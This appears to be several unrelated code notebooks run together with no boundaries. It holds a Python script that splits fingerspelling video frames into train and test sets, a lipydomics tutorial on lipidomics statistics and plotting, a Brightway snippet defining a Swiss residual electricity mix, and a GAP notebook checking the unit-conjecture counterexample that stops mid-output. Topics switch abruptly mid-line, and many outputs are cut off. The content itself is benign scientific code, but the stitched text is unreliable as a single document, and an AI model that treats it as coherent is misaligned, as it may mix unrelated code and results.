This script takes 10 images for each video that is most likely to contain the fingerspelling image and create training and test dataset.import os import glob import shutil srcDir = "./data/image/" if not os.path.exists("./data/train"): os.makedirs("./data/train") if not os.path.exists("./data/test"): os.makedirs("./data/test") dstDirTrain = "./data/train/" dstDirTest = "./data/test/" labels = [i for i in range(1,36) if i not in [10, 26, 27, 28, 29]] session = 2 dstDir = dstDirTest for label in labels: srcPath = srcDir + str(label) dstPath = dstDir + str(label) if not os.path.exists(dstPath): os.makedirs(dstPath) for person in range(1,21): for camera in ["cam1", "cam2"]: imagePath = srcPath + "/{}_{}_{}_{}_*.jpg".format(person, label, session, camera) print(imagePath) imageList = sorted(glob.glob(imagePath)) lastFile = imageList[-1] lastNumber = int(lastFile.replace(".jpg", "").split("_")[-1]) half = int(lastNumber/2) start = half - 10 for frame in range(start, half+1): extraZero = "" if frame < 10: extraZero = "0" image = srcPath + "/{}_{}_{}_{}_000000{}{}.jpg".format(person, label, session, camera, extraZero, frame) shutil.copy(image, dstPath)./data/image/1/1_1_2_cam1_*.jpg ./data/image/1/1_1_2_cam2_*.jpg ./data/image/1/2_1_2_cam1_*.jpg ./data/image/1/2_1_2_cam2_*.jpg ./data/image/1/3_1_2_cam1_*.jpg ./data/image/1/3_1_2_cam2_*.jpg ./data/image/1/4_1_2_cam1_*.jpg ./data/image/1/4_1_2_cam2_*.jpg ./data/image/1/5_1_2_cam1_*.jpg ./data/image/1/5_1_2_cam2_*.jpg ./data/image/1/6_1_2_cam1_*.jpg ./data/image/1/6_1_2_cam2_*.jpg ./data/image/1/7_1_2_cam1_*.jpg ./data/image/1/7_1_2_cam2_*.jpg ./data/image/1/8_1_2_cam1_*.jpg ./data/image/1/8_1_2_cam2_*.jpg ./data/image/1/9_1_2_cam1_*.jpg ./data/image/1/9_1_2_cam2_*.jpg ./data/image/1/10_1_2_cam1_*.jpg ./data/image/1/10_1_2_cam2_*.jpg ./data/image/1/11_1_2_cam1_*.jpg ./data/image/1/11_1_2_cam2_*.jpg ./data/image/1/12_1_2_cam1_*.jpg ./data/image/1/12_1_2_cam2_*.jpg ./data/image/1/13_1_2_cam1_*.jpg ./data/image/1/13_1_2_cam2_*.jpg ./data/image/1/14_1_2_cam1_*.jpg ./data/image/1/14_1_2_cam2_*.jpg ./data/image/1/15_1_2_cam1_*.jpg ./data/image/1/15_1_2_cam2_*.jpg ./data/image/1/16_1_2_cam1_*[...]Example Lipidomics Data Analysis (Interactive)_(lipydomics version: 1.4.x)_--- 1) Initialize a DatasetWe will be using `example_raw.csv` as the raw data file for this work (the data is positive mode and has not been normalized). We first need to initialize a lipydomics dataset from the raw data:# start an interactive session main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 1 Please enter the path to the csv file you want to work with. > example_raw.csv What ESI mode was used for this data? (pos/neg) > pos ! INFO: Loaded a new Dataset from .csv file: "example_raw.csv" Would you like to automatically assign groups from headers? (y/N) > What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 8 Dataset( csv="example_raw.csv", esi_mode="pos", samples=16, features=3342, identified=False, normalized=False, rt_calibrated=False, ext_var=False, group_indices=None, stats={} ) What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. 
Manage[...]We have now done the bare minimum to load the data and we have a lipydomics dataset initialized. We can see from the overview that there are 16 samples and 3342 features in this dataset. We saved our Dataset to file (`example.pickle`) for easy loading in subsequent steps. --- 2) Prepare the Dataset 2.1) Assign GroupsCurrently, we have 16 samples in our dataset, but we have not provided any information on what groups they belong to. We could have automatically assigned groups based on the properly formatted column headings in the raw data file (`example_raw.csv`) when we initialized the dataset, but we will assign them manually instead.# start an interactive session main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 2 Please enter the path to the pickle file you want to load. > example.pickle ! INFO: Loaded existing Dataset from .pickle file: "example.pickle" What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 1 Managing groups... What would you like to do? 1. Assign group 2. View assigned groups 3. Get data by group(s) "back" to go back > 1 Please provide a name for a group and its indices in order of name > starting index > ending index. * group name should not contain spaces * indices start at 0 * example: 'A 1 3' > 0641 0 3 ! INFO: Assigned indices: [0, 1, 2, 3] to group: "0641" Managing groups...[...]Now all of the samples have been assigned to one of four groups: `0641`, `geh`, `sal1`, and `wt`. These group IDs will be used later on when we select data or perform statistical analyses. 2.2) Normalize IntensitiesCurrently, the feature intensities are only raw values. We are going to normalize them using weights derived from an external normalization factor (pellet masses), but we also have the option to normalize to the signal from an internal standard if desired. The normalization weights are in `weights.txt`, a simple text file with the weights for each sample, one per line (16 total).# start an interactive session main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 2 Please enter the path to the pickle file you want to load. > example.pickle ! INFO: Loaded existing Dataset from .pickle file: "example.pickle" What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 6 Normalizing data... What would you like to do? 1. Internal 2. External "back" to go back > 2 Please provide a text file with the normalization values weights.txt ! INFO: Successfully normalized What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time [...]If we look at the dataset overview we can see that we now have assigned all of our samples to groups and we have a table of normalized intensities. 2.3) Identify LipidsAnother dataset preparation step we can perform before diving in to the data analysis is identifying as many lipids as possible. 
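All of the identification criteria described next reduce to a tolerance match of a measured feature against a reference entry. A rough sketch of that matching logic, with hypothetical feature/reference dictionaries (an illustration only, not the lipydomics implementation):

```python
# Sketch only: does a measured feature match a reference lipid within the tolerances?
# The CCS tolerance is a percentage, matching the convention used in the prompt below.
def feature_matches(feature, ref, mz_tol=0.03, rt_tol=0.3, ccs_tol_pct=3.0):
    return (abs(feature["mz"] - ref["mz"]) <= mz_tol
            and abs(feature["rt"] - ref["rt"]) <= rt_tol
            and abs(feature["ccs"] - ref["ccs"]) <= ccs_tol_pct / 100.0 * ref["ccs"])
```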
There are multiple identification criteria that take into account theoretical and measured m/z, retention time, and/or CCS, all of which vary in the level of confidence in the identifications they yield. We will use an approach that tries the highest confidence identification criteria first, then tries others.# start an interactive session main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 2 Please enter the path to the pickle file you want to load. > example.pickle ! INFO: Loaded existing Dataset from .pickle file: "example.pickle" What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 5 Identifying Lipids... Please enter the tolerances for m/z, retention time and CCS matching * separated by spaces * example: '0.01 0.5 3.0' * CCS tolerance is a percentage, not an absolute value > 0.03 0.3 3.0 Please specify an identification level 'theo_mz' - match on theoretical m/z 'theo_mz_rt' - match on theoretical m/z and retention time 'theo_mz_ccs' - match on theoretical m/z and CCS 'th[...]Using the `any` identification level and m/z, retention time, and CCS tolerances of 0.03 0.3 3.0, respectively, 2063 lipids were identified. Now the dataset is fully prepared and we can start performing statistical analyses and generating plots. --- 3) Statistical Analyses and Plotting 3.1) Compute ANOVA P-value for All GroupsA common analysis performed on lipidomics data is calculating the p-value of each feature from an ANOVA using the intensities from all groups. This gives an indication of how the variance between groups compares to the variance within groups, and a significant p-value indicates that there is some significant difference in the intensities for a given feature between the different groups.# start an interactive session main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 2 Please enter the path to the pickle file you want to load. > example.pickle ! INFO: Loaded existing Dataset from .pickle file: "example.pickle" What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 3 Managing statistics... What would you like to do? 1. Compute Statistics 2. View Statistics 3. Export .csv File of Computed Statistics "back" to go back > 1 Computing statistics... What would you like to do? 1. Anova-P 2. PCA3 3. PLS-DA 4. Two Group Correlation 5. PLS-RA (using external continuous variable) 6. Two Group Log2(fold-change) "back" to go back > 1 Would you like to use normalize[...]_* The above `RuntimeWarning` can be ignored in this case, it is caused by the presence of features that have all 0 intensities which gives a within-group variance of 0 and therefore causing devision by 0._ 3.2) Pricipal Components Analysis (All Groups)PCA is an untargeted analysis that gives an indication of the overall variation between samples, as well as the individual features that contribute to this variation. 
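For readers who want to reproduce this outside the interactive interface, the same kind of decomposition can be sketched with scikit-learn on a samples-by-features intensity matrix (hypothetical data here; lipydomics computes this internally):

```python
# Sketch only: 3-component PCA on a samples x features intensity matrix.
import numpy as np
from sklearn.decomposition import PCA

X = np.random.rand(16, 3342)        # hypothetical normalized intensities (16 samples, 3342 features)
pca = PCA(n_components=3)
projections = pca.fit_transform(X)  # per-sample scores, analogous to the "projections" stats entry
loadings = pca.components_.T        # per-feature loadings, analogous to the "loadings" stats entry
print(pca.explained_variance_ratio_)
```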
We will compute a 3-component PCA in order to assess the variance between groups in this dataset.# start an interactive session main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 2 Please enter the path to the pickle file you want to load. > example.pickle ! INFO: Loaded existing Dataset from .pickle file: "example.pickle" What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 3 Managing statistics... What would you like to do? 1. Compute Statistics 2. View Statistics 3. Export .csv File of Computed Statistics "back" to go back > 1 Computing statistics... What would you like to do? 1. Anova-P 2. PCA3 3. PLS-DA 4. Two Group Correlation 5. PLS-RA (using external continuous variable) 6. Two Group Log2(fold-change) "back" to go back > 2 Would you like to use normalize[...]Now we have computed the 3-component PCA, and we can see two new stats entries in our dataset: "PCA3_0641-geh-sal1-wt_projections_normed" and "PCA3_0641-geh-sal1-wt_loadings_normed". Now we can take a look at the projections in a plot.# start an interactive session main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 2 Please enter the path to the pickle file you want to load. > example.pickle ! INFO: Loaded existing Dataset from .pickle file: "example.pickle" What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 4 Making Plots... What would you like to do? 1. Bar plot feature by group 2. Batch bar plot features by group 3. Scatter PCA3 Projections by group 4. Scatter PLS-DA Projections by group 5. S-Plot PLSA-DA and Pearson correlation by group 6. Scatter PLS-RA Projections by group 7. Heatmap of Log2(fold-change) by lipid class "back" to go back > 3 Where would you like to save the plot(s)? (default =[...]Now we can take a look at the plot (`PCA3_0641-geh-sal1-wt_projections_normed.png`). It looks like `geh` and `wt` separate along PC1 while `sal1` and `wt` separate along PC2, so these might be a couple of good pairwise comparisons to explore further. 3.3) PLS-DA and Correlation on `wt` and `geh`Partial least-squares discriminant analysis (PLS-DA) is an analysis that is similar to PCA, except it finds significant variance between two specified groups (_i.e._ it is a supervised analysis).# start an interactive session main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 2 Please enter the path to the pickle file you want to load. > example.pickle ! INFO: Loaded existing Dataset from .pickle file: "example.pickle" What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 3 Managing statistics... What would you like to do? 1. Compute Statistics 2. View Statistics 3. 
Export .csv File of Computed Statistics "back" to go back > 1 Computing statistics... What would you like to do? 1. Anova-P 2. PCA3 3. PLS-DA 4. Two Group Correlation 5. PLS-RA (using external continuous variable) 6. Two Group Log2(fold-change) "back" to go back > 3 Would you like to use normalize[...]Now we have computed the PLS-DA, and we can see two new stats entries in our dataset: "PLS-DA_geh-wt_projections_normed" and "PLS-DA_geh-wt_loadings_normed". Now we can take a look at the projections in a plot.# start an interactive session main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 2 Please enter the path to the pickle file you want to load. > example.pickle ! INFO: Loaded existing Dataset from .pickle file: "example.pickle" What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 4 Making Plots... What would you like to do? 1. Bar plot feature by group 2. Batch bar plot features by group 3. Scatter PCA3 Projections by group 4. Scatter PLS-DA Projections by group 5. S-Plot PLSA-DA and Pearson correlation by group 6. Scatter PLS-RA Projections by group 7. Heatmap of Log2(fold-change) by lipid class "back" to go back > 4 Where would you like to save the plot(s)? (default =[...]Now we can take a look at the plot (`PLS-DA_projections_geh-wt_normed.png`).As expected, `geh` and `wt` separate cleanly along component 1 corresponding to between group differences. The spread of both groups along component 2, related to intra-group variance, is similar between both groups indicating a similar amount of variance in both groups uncorrelated between them. A similar targeted analysis is the Pearson correlation coefficient between the two groups, which we need to calculate in order to produce an S-plot and tease out which lipid features are driving the separation between `geh` and `wt`.# start an interactive session main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 2 Please enter the path to the pickle file you want to load. > example.pickle ! INFO: Loaded existing Dataset from .pickle file: "example.pickle" What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 3 Managing statistics... What would you like to do? 1. Compute Statistics 2. View Statistics 3. Export .csv File of Computed Statistics "back" to go back > 1 Computing statistics... What would you like to do? 1. Anova-P 2. PCA3 3. PLS-DA 4. Two Group Correlation 5. PLS-RA (using external continuous variable) 6. Two Group Log2(fold-change) "back" to go back > 4 Would you like to use normalize[...]We can take a look at the plot that was generated (`S-Plot_geh-wt_normed.png`).There appear to be several lipid features that drive separation between `geh` and `wt`, as indicated by the points in the lower left (red) and upper right (blue) corners of the plot. The last step is to export the data and manually inspect these significant features. 
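For intuition, the correlation axis of the S-plot is simply a per-feature Pearson correlation between intensity and group membership; a small sketch with hypothetical data (two groups of four samples each):

```python
# Sketch only: Pearson correlation of each feature's intensity with group membership.
import numpy as np

X = np.random.rand(8, 100)                   # hypothetical intensities: 8 samples x 100 features
labels = np.array([0, 0, 0, 0, 1, 1, 1, 1])  # hypothetical encoding: 0 = wt, 1 = geh
corr = np.array([np.corrcoef(X[:, j], labels)[0, 1] for j in range(X.shape[1])])
# Features with |corr| close to 1 end up in the extreme corners of the S-plot.
```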
4) Export Dataset to SpreadsheetWe need to export our processed Dataset into a spreadsheet format so that we can more closely inspect the data and identify the lipid features that drive the separation that we identified between the `geh` and `wt` groups.# start an interactive session main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 2 Please enter the path to the pickle file you want to load. > example.pickle ! INFO: Loaded existing Dataset from .pickle file: "example.pickle" What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 10 Exporting data... Where would you like to save the file? example: 'jang_ho/results.xlsx' "back" to go back > example.xlsx ! INFO: Successfully exported dataset to Excel spreadsheet: example.xlsx. What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Tim[...]5) Examine Specific LipidsManual inspection of the data has revealed a handful of individual lipid species that differ significantly between `geh` and `wt`:| abundant in | m/z | retention time | CCS | putative id | id level || :---: | :---: | :---: | :---: | :--- | :--- || `geh` | 874.7869 | 0.43 | 320.3 | TG(52:3)_[M+NH4]+ | meas_mz_ccs || `geh` | 878.8154 | 0.62 | 322.7 | TG(52:1)_[M+NH4]+ | meas_mz_ccs || `geh` | 848.7709 | 0.40 | 313.3 | TG(50:2)_[M+NH4]+ | theo_mz_ccs || `geh` | 605.5523 | 0.86 | 267.7 | DG(36:1)_[M+H-H2O]+ | theo_mz_ccs || `geh` | 591.5378 | 0.93 | 263.9 | DG(35:1)_[M+H-H2O]+ | theo_mz_ccs || `wt` | 496.3423 | 4.15 | 229.8 | LPC(16:0)_[M+H]+ | meas_mz_ccs || `wt` | 524.3729 | 4.08 | 235.1 | LPC(18:0)_[M+H]+ | meas_mz_ccs || `wt` | 810.6031 | 3.46 | 295.3 | PC(36:1)_[M+Na]+ | meas_mz_ccs || `wt` | 782.5729 | 3.50 | 290.5 | PG(35:0)_[M+NH4]+ | theo_mz_ccs | 5.1) Generate Plots for Significant Lipid FeaturesNow that we have identified some potentially significant lipid feautures, we need to generate some bar plots for comparison. To avoid clogging up our working directory, we will save the feature plots in the `features` directory. The m/z, retention time, and CCS values are all listed in `features.csv`, and we will use this to generate the barplots all at once.# start an interactive session main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 2 Please enter the path to the pickle file you want to load. > example.pickle ! INFO: Loaded existing Dataset from .pickle file: "example.pickle" What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 4 Making Plots... What would you like to do? 1. Bar plot feature by group 2. Batch bar plot features by group 3. Scatter PCA3 Projections by group 4. Scatter PLS-DA Projections by group 5. S-Plot PLSA-DA and Pearson correlation by group 6. Scatter PLS-RA Projections by group 7. Heatmap of Log2(fold-change) by lipid class "back" to go back > 2 Where would you like to save the plot(s)? 
(default =[...]Now we can look at all of the plots that have been generated in the `features/` directory. __Abundant in `geh`__ __Abundant in `wt`__ 5.2) Generate a Heatmap of TGs There seems to be an upregulation of TGs in `geh` relative to `wt`, so it might be nice to see if there are any large-scale trends among TGs as a lipid class between these groups. In order to make this comparison, we will need to compute another statistic: the Log2(fold-change) between the two groups.main()What would you like to do? 1. Make a new Dataset 2. Load a previous Dataset > 2 Please enter the path to the pickle file you want to load. > example.pickle ! INFO: Loaded existing Dataset from .pickle file: "example.pickle" What would you like to do with this Dataset? 1. Manage Groups 2. Filter Data 3. Manage Statistics 4. Make Plots 5. Lipid Identification 6. Normalize Intensities 7. Calibrate Retention Time 8. Overview of Dataset 9. Batch Feature Selection 10. Export Current Dataset to Spreadsheet 11. Save Current Dataset to File "exit" to quit the interface > 3 Managing statistics... What would you like to do? 1. Compute Statistics 2. View Statistics 3. Export .csv File of Computed Statistics "back" to go back > 1 Computing statistics... What would you like to do? 1. Anova-P 2. PCA3 3. PLS-DA 4. Two Group Correlation 5. PLS-RA (using external continuous variable) 6. Two Group Log2(fold-change) "back" to go back > 6 Would you like to use normalize[...]Create `ActivityDataset` as this is the only way to specify the `id`.AD.create( id=100000, code="CH-residual", database="Swiss residual electricity mix", location="CH", name="Swiss residual electricity mix", product="electricity, high voltage", type="process", data=dict( unit="kilowatt_hour", comment="Difference between generation fractions for SwissGrid and ENTSO", location="CH", name="Swiss residual electricity mix", reference_product="electricity, high voltage", ) ) act = bd.get_activity(id=100000) act act.new_exchange(input=act, type="production", amount=1).save() switzerland_residual = { 'electricity production, hydro, reservoir, alpine region': 0.2814150228066876, 'electricity production, hydro, run-of-river': 0.636056236216345, 'heat and power co-generation, wood chips, 6667 kW, state-of-the-art 2014': 0.012048389472504549, 'heat and power co-generation, biogas, gas engine': 0.059773867534434144, 'heat and power co-generation, natural gas, 500kW electrical, lean burn': 0.006612375072688834, 'electricity production, wind, >3MW turbine, onshore': 0.0010024269784498687, 'electricity production, wind, 1-3MW turbine, onshore': 0.0026554668750543753, 'electricity production, wind, <1MW turbine, onshore': 0.00043621504383564323 } act_mapping = { act: switzerland_residual[act['name']] for act in bd.Database("ecoinvent 3.8 cutoff") if act['location'] == 'CH' and act['unit'] == 'kilowatt hour' and act['name'] in switzerland_residual } assert len(act_mapping) == len(switzerland_residual) act_mapping for key, value in act_mapping.items(): act.new_exchange(input=key, type='technosphere', amount=value).save() for exc in act.exchanges(): print(exc) sr.process()Verification of the counterexample to the unit conjecture for group rings In this notebook, we follow the proof by in "A counterexample to the unit conjecture for group rings" (https://arxiv.org/abs/2102.11818) and provide an independent verification of the calculations in GAP. 
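For reference, the group used in the counterexample (often called the Promislow group) has the presentation

$$ G \;=\; \langle\, a,\, b \;\mid\; (a^2)^b = a^{-2},\; (b^2)^a = b^{-2} \,\rangle, $$

which is exactly what the relators passed to `ParseRelators` in the next cell encode.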
The natural idea would be to create the group $G$ as follows:F:=FreeGroup("a","b"); G:=F/ParseRelators(GeneratorsOfGroup(F),"(a^2)^b=a^-2, (b^2)^a=b^-2");This, however, does not work. Depending on the packages loaded, GAP will either descend into calculating the order of the group, or, if you try to bypass that by setting the size to infinity, it will run out of time after the following: ```SetSize(G,infinity); # to trick LAGUNA package gens:=GeneratorsOfGroup(G);a:=gens[1];;b:=gens[2];;F:=GF(2);FG:=GroupRing(F,G);e:=One(FG);;x:=e*a^2;;y:=e*b^2;;z:=e*(a*b)^2;;p:=(e+x)*(e+y)*(e+z^-1);``` We can use the dataset "Diffuse property of low dimensional Bieberbach groups" by (https://mat.ug.edu.pl/~rlutowsk/diffuse/), mentioned in "A short note about diffuse Bieberbach groups" by , and (https://arxiv.org/abs/1703.04972), to find the generators of this group, given as a matrix group. After downloading and unpacking the dataset, call in GAP```f:=ReadAsFunction("diffuse.g");d:=f();;d3:=Filtered(d, x-> x.dim=3);; # only 10 groups of dimension 3 g:=Filtered(d3, x-> x.diffuse=false);```to get```[ rec( cgens := [ [ [ -1, 0, 0, 0 ], [ 0, 1, 0, 1/2 ], [ 0, 0, -1, 1/2 ], [ 0, 0, 0, 1 ] ], [ [ 1, 0, 0, 1/2 ], [ 0, -1, 0, 0 ], [ 0, 0, -1, 0 ], [ 0, 0, 0, 1 ] ] ], diffuse := false, dim := 3, hdiff := false, holonomy := [ 4, 2 ], name := "min.10.1.1.7", zrank := 0 ) ]``` Now we can construct the group using the supplied generators and follow the proof to check that it indeed yields a non-trivial unit.gens:= [ [ [ -1, 0, 0, 0 ], [ 0, 1, 0, 1/2 ], [ 0, 0, -1, 1/2 ], [ 0, 0, 0, 1 ] ], [ [ 1, 0, 0, 1/2 ], [ 0, -1, 0, 0 ], [ 0, 0, -1, 0 ], [ 0, 0, 0, 1 ] ] ]; a:=gens[1]; b:=gens[2]; G:=Group(gens); Size(G)=infinity;We now construct the group algebra of $G$ over the field of two elements $F$:F:=GF(2); FG:=GroupRing(F,G);; Print(FG);AlgebraWithOne( GF(2), ... )This is the identity element of $FG$.
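Before building them in GAP, it is convenient to write out the elements that Theorem A of the paper works with (transcribed to match the cells below, with $1$ denoting the identity of $FG$):

$$ x = a^2, \qquad y = b^2, \qquad z = (ab)^2, $$
$$ p = (1+x)(1+y)(1+z^{-1}), \qquad q = x^{-1}y^{-1} + x + y^{-1}z + z, $$
$$ r = 1 + x + y^{-1}z + xyz, \qquad s = 1 + (x + x^{-1} + y + y^{-1})z^{-1}, $$
$$ u = p + qa + rb + sab. $$

We now return to the identity element of $FG$.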
We will use it to embed elements of $G$ into $FG$ (of course, we could have used `Embedding` instead).e:=One(FG);;Print(e);(Z(2)^0)*[ [ 1, 0, 0, 0 ], [ 0, 1, 0, 0 ], [ 0, 0, 1, 0 ], [ 0, 0, 0, 1 ] ]Here we construct $x$, $y$, $p$, $q$,$r$, $s$ as given in the formulation of Theorem A:x:=e*a^2;;Print(x); y:=e*b^2;;Print(y); z:=e*(a*b)^2;;Print(z); p:=(e+x)*(e+y)*(e+z^-1);;Print(p); q:=x^-1*y^-1 + x + y^-1*z + z;;Print(q); r:=e+x+y^-1*z+x*y*z;;Print(r); s:=e+(x+x^-1+y+y^-1)*z^-1;;Print(s);(Z(2)^0)*[ [ 1, 0, 0, -1 ], [ 0, 1, 0, 0 ], [ 0, 0, 1, -1 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ 1, 0, 0, 0 ], [ 0, 1, 0, -1 ], [ 0, 0, 1, -1 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ 1, 0, 0, 0 ], [ 0, 1, 0, 0 ], [ 0, 0, 1, 0 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ 1, 0, 0, 0 ], [ 0, 1, 0, 1 ], [ 0, 0, 1, -1 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ 1, 0, 0, 1 ], [ 0, 1, 0, 0 ], [ 0, 0, 1, -1 ], [ 0, 0, 0, 1 ] ]Then theorem A states that $u$ is a non-trivial unit of $FG$:u := p + q*a + r*b + s*a*b;;Print(u);(Z(2)^0)*[ [ -1, 0, 0, -3/2 ], [ 0, -1, 0, 1/2 ], [ 0, 0, 1, -1/2 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ -1, 0, 0, -1 ], [ 0, 1, 0, -1/2 ], [ 0, 0, -1, 1/2 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)* [ [ -1, 0, 0, -1 ], [ 0, 1, 0, 1/2 ], [ 0, 0, -1, 3/2 ], [ 0, 0, 0, 1 ] ]+( Z(2)^0)*[ [ -1, 0, 0, -1/2 ], [ 0, -1, 0, -1/2 ], [ 0, 0, 1, -1/2 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ -1, 0, 0, -1/2 ], [ 0, -1, 0, 1/2 ], [ 0, 0, 1, 1/2 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)* [ [ -1, 0, 0, -1/2 ], [ 0, -1, 0, 3/2 ], [ 0, 0, 1, -1/2 ], [ 0, 0, 0, 1 ] ]+( Z(2)^0)*[ [ -1, 0, 0, 0 ], [ 0, 1, 0, 1/2 ], [ 0, 0, -1, 3/2 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ -1, 0, 0, 0 ], [ 0, 1, 0, 3/2 ], [ 0, 0, -1, 1/2 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)* [ [ -1, 0, 0, 1/2 ], [ 0, -1, 0, 1/2 ], [ 0, 0, 1, -1/2 ], [ 0, 0, 0, 1 ] ]+( Z(2)^0)*[ [ 1, 0, 0, -1/2 ], [ 0, -1, 0, 0 ], [ 0, 0, -1, 1 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ 1, 0, 0, 0 ], [ 0, 1, 0, 0 ], [ 0, 0, 1, -1 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ 1, 0, 0, 0 ], [ 0, 1, 0, 0 ], [ 0, 0, 1, [...]Here there is a construction of $v = u^{-1}$:p1 := x^-1 * p^(e*a);;Print(p1); q1 := -x^-1 * q;;Print(q1); r1 := -y^-1 * r;;Print(r1); s1 := z^-1 * s^(e*a);;Print(s1); v := p1 + q1*a + r1*b + s1*a*b;;Print(v);(Z(2)^0)*[ [ -1, 0, 0, -3/2 ], [ 0, -1, 0, 1/2 ], [ 0, 0, 1, 1/2 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ -1, 0, 0, -1 ], [ 0, 1, 0, -3/2 ], [ 0, 0, -1, 1/2 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)* [ [ -1, 0, 0, -1 ], [ 0, 1, 0, -1/2 ], [ 0, 0, -1, 3/2 ], [ 0, 0, 0, 1 ] ]+( Z(2)^0)*[ [ -1, 0, 0, -1/2 ], [ 0, -1, 0, -1/2 ], [ 0, 0, 1, 1/2 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ -1, 0, 0, -1/2 ], [ 0, -1, 0, 1/2 ], [ 0, 0, 1, -1/2 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)* [ [ -1, 0, 0, -1/2 ], [ 0, -1, 0, 3/2 ], [ 0, 0, 1, 1/2 ], [ 0, 0, 0, 1 ] ]+( Z(2)^0)*[ [ -1, 0, 0, 0 ], [ 0, 1, 0, -1/2 ], [ 0, 0, -1, 3/2 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)*[ [ -1, 0, 0, 0 ], [ 0, 1, 0, 1/2 ], [ 0, 0, -1, 1/2 ], [ 0, 0, 0, 1 ] ]+(Z(2)^0)* [ [ -1, 0, 0, 1/2 ], [ 0, -1, 0, 1/2 ], [ 0, 0, 1, 1/2 ], [ 0, 0, 0, 1 ] ]+( Z(2)^0)*[ [ 1, 0, 0, -3/2 ], [ 0, -1, 0, 0 